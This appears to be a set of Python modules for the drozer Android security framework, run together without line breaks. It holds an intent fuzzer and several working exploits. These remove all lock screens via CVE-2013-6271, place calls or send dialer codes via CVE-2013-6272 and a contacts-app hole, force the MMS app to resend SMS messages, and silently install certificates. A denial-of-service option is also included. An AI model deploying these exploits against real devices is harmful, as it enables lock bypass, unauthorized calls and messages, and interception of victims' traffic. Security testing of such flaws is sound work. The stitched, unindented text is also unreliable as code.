def run_seed_file(self, file_name, device): ''' Fuction for runing all intents from a seed file ''' with open(file_name, 'r') as f: lines = f.readlines() if lines is not None: intents = len(lines) print("Number of intents:" + str(intents) + "\n") for line in lines: parse_intent = line.split(" ") intent_type = parse_intent[2] package_name = parse_intent[4] component = parse_intent[6] if intent_type == 'fuzzing': uri = parse_intent[8] cat = parse_intent[10] ac = parse_intent[12] fl = parse_intent[14] extra_type = parse_intent[16] key = parse_intent[18] extra_value = parse_intent[20] msg = intent_type + " " + package_name + " " + \ component + " " + uri + " " + cat + " " + \ ac + " " + fl + " " + extra_type + " " + \ key + " " + extra_value print msg log_in_logcat(str(msg), device) try: intent = android.Intent(component=(package_name, str(component)), flags=[fl], data_uri=uri, category=cat, action=ac, extras=[(str(extra_type), str(key), str(extra_value)) ]) intent.flags.append("ACTIVITY_NEW_TASK") self.getContext().startActivity( intent.buildIn(self)) except: e = sys.exc_info()[0] elif intent_type == 'broadcast': intent = android.Intent(component=(package_name, str(component))) msg = intent_type + " " + package_name + " " + component print msg log_in_logcat(str(msg), device) try: self.getContext().sendBroadcast( intent.buildIn(self)) except: pass return intents
def run_intent(self, package_name, component, uri, ac, cat, fl, extra_type, key, extra_value, device): ''' Function for running fuzzy intent with parameters ''' flag = [] msg = "fuzzing_intent " + "type: fuzzing" + " package: " + \ str(package_name) + " component: " + str(component) + \ " data_uri: " + str(uri) + " category: " + str(cat) + \ " action: " + str(ac) + " flag: " + str(fl) + \ " extra_type: " + str(extra_type) + " extra_key: " + \ str(key) + " extra_value: " + str(extra_value) print msg log_in_logcat(str(msg), device) try: intent = android.Intent(component=(package_name, str(component)), flags=[fl], data_uri=uri, category=cat, action=ac, extras=[(str(extra_type), str(key), str(extra_value))]) #you can't open an activity from another app #without "ACTIVITY_NEW_TASK" flag intent.flags.append("ACTIVITY_NEW_TASK") self.getContext().startActivity(intent.buildIn(self)) except: e = sys.exc_info()[0] #print e save_logcat("fuzzing", str(package_name), str(component), device, self.current_dir)
def execute(self, arguments): if arguments.message == None or arguments.telephone == None: self.stderr.write("Must specify a message with \"-m\" and a recipient with \"-t\"\n") return if (len(arguments.component) != 2): self.stderr.write("[-] Invalid package and component: %s %s%(arguments.component[0],arguments.component[1]\n") return self.stdout.write("[+] Drafting SMS message to send.\n") #sleep(2) self.draftsms(arguments) self.stdout.write("[+] Calling app to send message to drafts.\n") #sleep(2) intent = android.Intent(component=(arguments.component[0], arguments.component[1]), flags=['ACTIVITY_NEW_TASK']) if intent.isValid(): self.getContext().startActivity(intent.buildIn(self)) else: self.stderr.write("[-] Invalid App Activity Intent!\n") sleep(2) self.stdout.write("[+] Sending draft messages.\n") self.smsordered(arguments, self.RESULT_ERROR_RADIO_OFF) self.stdout.write("[+] Message sent.\n")
def execute(self, arguments): # Initiate the phone call intent = android.Intent(action="android.intent.action.CALL", data_uri="tel:" + arguments.number, flags=["ACTIVITY_NEW_TASK"]) self.getContext().startActivity(intent.buildIn(self)) self.stdout.write("[*] Sent intent to call %s\n" % arguments.number)
def draftsms(self, arguments): act = "android.intent.action.SENDTO" cat = None comp = None data = "smsto:" + arguments.telephone extr = [['string', 'sms_body', arguments.message]] flgs = ['ACTIVITY_NEW_TASK'] #build the intent intent = android.Intent(action=act, category=cat, data_uri=data, component=comp, extras=extr, flags=flgs) if intent.isValid(): self.getContext().startActivity(intent.buildIn(self)) else: self.stderr.write("[-] Invalid!\n")
def smsordered(self, arguments, initialcode): # This is the vulnerability - setting RESULT_ERROR_RADIO_OFF causes message to be requeued act = "com.android.mms.transaction.MESSAGE_SENT" cat = None comp = ("com.android.mms", "com.android.mms.transaction.SmsReceiver") data = "content://sms" extr = None flgs = None #build the intent intent = android.Intent(action=act, category=cat, data_uri=data, component=comp, extras=extr, flags=flgs) if intent.isValid(): self.getContext().sendOrderedBroadcast(intent.buildIn(self), None, None, None, initialcode, None, None) else: self.stderr.write("[-] Invalid Intent!\n")
def execute(self, arguments): if arguments.code != None and arguments.telephone != None: self.stderr.write("Please specify only -t or -c\n") return if arguments.code == None and arguments.telephone == None: self.stderr.write("Please specify -t or -c\n") return self.stdout.write("[+] Exploiting CVE-2014-N/A\n") if arguments.telephone != None: #set action as CALL act = "android.provider.Contacts.SEARCH_SUGGESTION_DIAL_NUMBER_CLICKED" #add the prefix data = "tel:%s" % arguments.telephone self.stdout.write("[+] Dialing: %s\n" % arguments.telephone) elif arguments.code != None: #set action as CALL act = "android.provider.Contacts.SEARCH_SUGGESTION_DIAL_NUMBER_CLICKED" #add the prefix data = "tel:%s" % arguments.code self.stdout.write("[+] Sending code: %s\n" % arguments.code) else: self.stdout.write("[-] Something went wrong.\n") return #build the intent intent = android.Intent(action=act, data_uri=data, component=[ 'com.android.contacts', 'com.android.contacts.ContactsListActivity' ], flags=['ACTIVITY_NEW_TASK']) if intent.isValid(): self.getContext().startActivity(intent.buildIn(self)) else: self.stderr.write("[-] Invalid!\n")
def execute(self, arguments): if arguments.code != None and arguments.telephone != None and arguments.kill!= None: self.stderr.write("Please specify only -t, -c or -k not all\n") arguments.print_help() return if arguments.code == None and arguments.telephone == None and arguments.kill == None: self.stderr.write("Please specify -t, -c or -k\n") return self.stdout.write("[+] Exploiting CVE-2013-6272\n") if arguments.telephone != None: #set action as CALL act = "com.android.phone.ACTION_CALL_BACK_FROM_NOTIFICATION" #add the prefix data = "tel:%s" % arguments.telephone self.stdout.write("[+] Dialing: %s\n" % arguments.telephone) elif arguments.code != None: #set action as CALL act = "com.android.phone.ACTION_CALL_BACK_FROM_NOTIFICATION" #add the prefix data = "tel:%s" % arguments.code self.stdout.write("[+] Sending code: %s\n" % arguments.code) elif arguments.kill == True: act = "com.android.phone.ACTION_HANG_UP_ONGOING_CALL" data = None self.stdout.write("[+] Killing ongoing call\n") else: self.stdout.write("[-] Something went wrong.\n") return #build the intent intent = android.Intent(action=act, data_uri=data, component=['com.android.phone','com.android.phone.PhoneGlobals$NotificationBroadcastReceiver']) if intent.isValid(): self.getContext().sendBroadcast(intent.buildIn(self)) else: self.stderr.write("[-] Invalid!\n")
def execute(self, arguments): self.stdout.write("[+] Exploiting CVE-2013-6271 - Removing all set locks!\n") #well we do not need to define the None's, but for the fun of it lets do it :) act = None cat = None comp = ['com.android.settings','com.android.settings.ChooseLockGeneric'] data = None extr = [['boolean', 'confirm_credentials', 'false'], ['integer','lockscreen.password_type', '0']] flgs = ['ACTIVITY_NEW_TASK'] #build the intent intent = android.Intent(action=act, category=cat, data_uri=data, component=comp, extras=extr, flags=flgs) if intent.isValid(): self.getContext().startActivity(intent.buildIn(self)) else: self.stderr.write("[-] Invalid!\n")
def execute(self, arguments): try: print "Uploading" myfile = open(arguments.source, 'rb') with myfile: cert = myfile.read() intent = android.Intent(action="android.credentials.INSTALL", extras=[], flags=[]) name = arguments.name if arguments.name == None: name = os.path.basename(arguments.source).split('.')[0] intent.extras.append(("string", "name", name)) intent.extras.append(("bytearray", "CERT", cert)) intent.flags.append(("ACTIVITY_NEW_TASK")) self.getContext().startActivity(intent.buildIn(self)) print "Done" except Exception as error: print error
def execute(self, arguments): package_name = "" fuzz_parameters = [] fuzz_number = 7 device = "" intents = 1 if arguments.device: device = arguments.device test_all = 0 params = "" #set results folder (~/fuzzinozer_results is implicit value); #if you want to change it go to "~/.bashrc file" self.current_dir = "" pm = self.packageManager() env = os.environ.get("FUZZ_RES") if env is None: os.environ["FUZZ_RES"] = os.path.expanduser("~") + \ "/fuzzinozer_results" env = os.environ.get("FUZZ_RES") self.current_dir = str(env) if not os.path.isdir(env): getoutput("mkdir " + env) found = 0 if arguments.select_fuzz_parameters: params = arguments.select_fuzz_parameters if arguments.template_fuzz_parameters_number: fuzz_number = int(arguments.template_fuzz_parameters_number) fuzz_parameters = self.generate_templates(fuzz_number) intents = len(fuzz_parameters) if arguments.dos_attack: found = 1 nr = int(arguments.dos_attack) self.dos(nr) total_intents = nr if arguments.complete_test: intents = len(actions)*len(flags)*len(extra_keys) * \ len(extra_types)*len(categories) total_intents = 0 if arguments.test_all: test_all = 1 for package in self.packageManager().getPackages(): packageNameString = package.applicationInfo.packageName activities = [] if arguments.fuzzing_intent: activities = FuzzinozerPackageManager(self). \ getActivities(str(packageNameString)) elif arguments.broadcast_intent: activities = FuzzinozerPackageManager(self). \ getReceivers(str(packageNameString)) if (activities is not None): total_intents = total_intents + intents*len(activities) if arguments.package_name: activities = [] package_name = arguments.package_name if arguments.broadcast_intent: activities = FuzzinozerPackageManager(self). \ getReceivers(package_name) else: activities = FuzzinozerPackageManager(self). \ getActivities(package_name) if (activities is not None): total_intents = total_intents + intents*len(activities) print("Number of intents:" + str(total_intents) + "\n") seed_file = "" if arguments.run_seed: found = 1 seed_file = arguments.run_seed if seed_file is not "": print "RUN INTENTS FROM " + seed_file total_intents = self.run_seed_file(seed_file, device) if arguments.package_name or arguments.test_all: if os.path.isfile(str(str(self.current_dir) +"/all_intents.txt")): os.remove(str(str(self.current_dir) +"/all_intents.txt")) if arguments.broadcast_intent: for package in self.packageManager().getPackages(): packageNameString = str(package.applicationInfo.packageName) if (packageNameString == package_name or test_all == 1): found = 1 pm = self.packageManager() receivers = [] receivers = FuzzinozerPackageManager(self). \ getReceivers(packageNameString) if (receivers is not None): for val in receivers: msg = "broadcast_intent " + \ "type: broadcast" + \ " package: " + packageNameString + \ " component: " + str(val) + " " print msg log_in_logcat(str(msg), device) intent = android.Intent(component=(packageNameString, str(val))) try: self.getContext().sendBroadcast(intent.buildIn(self)) except: pass save_logcat("broadcast", packageNameString, val, device, self.current_dir) result_folder = str(self.current_dir) + "/Results_" + \ str('broadcast') + "_" + \ str(packageNameString) if os.path.isdir(result_folder): if os.listdir(result_folder) == []: shutil.rmtree(result_folder) elif arguments.fuzzing_intent: for package in self.packageManager().getPackages(): packageNameString = str(package.applicationInfo.packageName) if (packageNameString == package_name or test_all == 1): found = 1 pm = self.packageManager() activities = [] activities = FuzzinozerPackageManager(self).getActivities(packageNameString) if (activities is not None): for val in activities: #if template_fuzz_parameters_number run all the generated templates if (fuzz_number < 7): for temp in fuzz_parameters: print ("TEMPLATE:" + temp) extra_type = str(random.choice(extra_types)) if temp[0] == "0": ac = random.choice(actions) else: ac = string_generator(random.randint(10, 100)) if temp[1] == "0": cat = random.choice(categories) else: cat = string_generator(random.randint(10, 100)) if temp[2] == "0": uri = string_generator(random.randint(10, 100)) else: uri = string_generator(random.randint(10, 100)) if temp[3] == "0": key = random.choice(extra_keys) else: key = string_generator(random.randint(10, 100)) if temp[4] == "0": extra_value = str(random_value(extra_type)) else: extra_value = string_generator(random.randint(10, 100)) if temp[5] == "0": fl = random.choice(flags) else: fl = string_generator(random.randint(10, 100)) self.run_intent(packageNameString, val, uri, ac, cat, fl, extra_type, key, extra_value, device) else: uri = generate_random_uri() if "category" in params: cat = string_generator(random.randint(10, 100)) else: cat = random.choice(categories) if "action" in params: ac = string_generator(random.randint(10, 100)) else: ac = random.choice(actions) if "flag" in params: fl = string_generator(random.randint(10, 100)) else: fl = random.choice(flags) if "extra_key" in params: key = string_generator(random.randint(10, 100)) else: key = random.choice(extra_keys) extra_type = str(random.choice(extra_types)) extra_value = str(random_value(extra_type)) self.run_intent(packageNameString, val, uri, ac, cat, fl, extra_type, key, extra_value, device) elif arguments.complete_test: for package in self.packageManager().getPackages(): packageNameString = package.applicationInfo.packageName if (packageNameString == package_name or arguments.test_all): found = 1 save_state = False reload_option = False aux_num = " " if arguments.save_state: save_state = True if arguments.reload: reload_option = True aux_num = arguments.reload self.test_all_possible(packageNameString, device, self.current_dir, save_state, reload_option, aux_num) print("Total number of intents:" + str(total_intents) + "\n") else: print "Wrong parameters!! Run help to see the parameters" print("Total number of intents:" + str(total_intents) + "\n") if (found == 0): print ("Package not installed")